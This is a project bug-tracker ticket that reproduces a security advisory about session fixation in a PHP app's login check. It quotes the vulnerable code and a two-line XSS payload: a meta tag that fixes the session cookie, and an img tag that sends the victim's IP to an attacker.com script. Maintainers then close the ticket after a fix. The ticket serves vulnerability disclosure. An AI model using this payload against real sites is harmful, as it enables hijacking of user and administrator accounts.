#228 SESSION FIXATION

closed-out-of-date
nabber00
Security (24)
7
2010-08-15
2010-08-15
nabber00
No

In a session fixation attack, the attacker have to set
the victim's session id. In our case, the attacker fix
the user's session id, the victim which is logged in,
will get logged out when the cookie will be set, then
if the victim try to log in, the session id will be
registered on the server. Let's see a part of the
logged_in() function:

11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
12|
13| // Turn off URL SIDs.
14| ini_set('url_rewriter.tags','');
15| ini_set('session.use_trans_sid', false);
16|
17| // Init the session.
18| session_set_cookie_params(60*60*24*5);
19|
20| // Check if the user has a client-side cookie.
21| if ( isset( $_COOKIE[ 'sid' ] ) ) {
22| session_id($_COOKIE[ 'sid' ]);
23| }
24|
25| // Start the session.
26| session_start ();
27|
28| // Check if user is logged in.
29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
| $_SESSION[ 'logged_in' ] == 'yes' ) {
|
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }

After, the attacker, who knows the session id, just
have to use it to be logged in as the victim's account.
But in our case, he must also know the victim's IP.
I'll demonstrate how to get administrator rights even
if the victim has a protection against XSS (NoScript
Firefox plugin for example). First, the attacker will
fix the victim's session id by setting a cookie to
the victim. Then he'll also force the victim's web
browser to establish a connexion to a script that
will get the victim's IP. Take a look at this schema:

+----------------------------------------------------------+
| The attacker post a comment using the XSS vulnerability. |
| The code which will be executed on the client browser |
| will set the "sid" cookie, it will also force the |
| victim's web browser to send an HTTP packet to a script |
| that will mail the victim's IP to the attacker. |
+----------------------------------------------------------+
|
| +---------------------------------------------------+
+--> | <meta http-equiv=Set-Cookie content=sid=MD5HERE;> |
| <img src=http://attacker.com/getip_and_mail.php> |
+---------------------------------------------------+
|
+-------------------------------------------------+ |
| The victim, which is logged in, have to see the | <--+
| comments page. After saw it, the victim will be |
| logged out. |
+-------------------------------------------------+
|
| +------------------------------------------+
+--> | The victim try to log in. Now that she's |
| logged in, the session id set by the |
| attacker is registered on the server. |
+------------------------------------------+
|
+--------------------------------------------+ |
| Now the attacker just have to send an HTTP |<--+
| packet which contains the session id and a |
| special header with the victim's IP. |
| The attacker is logged in as the victim's |
| account. |
+--------------------------------------------+

As you can see, even if the victim is protected against
XSS, it's always possible to get adminitrator rights with
this type of attack, we juste use the "meta" and "img" tags.

Source: http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html

Discussion

  • nabber00

    nabber00 - 2010-08-15

    Need to review how session management is handled here.

     
  • nabber00

    nabber00 - 2010-08-15

    When the getIP() function was fixed, this was also closed since the IP address is verified.

     
  • nabber00

    nabber00 - 2010-08-15
    • status: open --> closed-out-of-date
     

Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:





No, thanks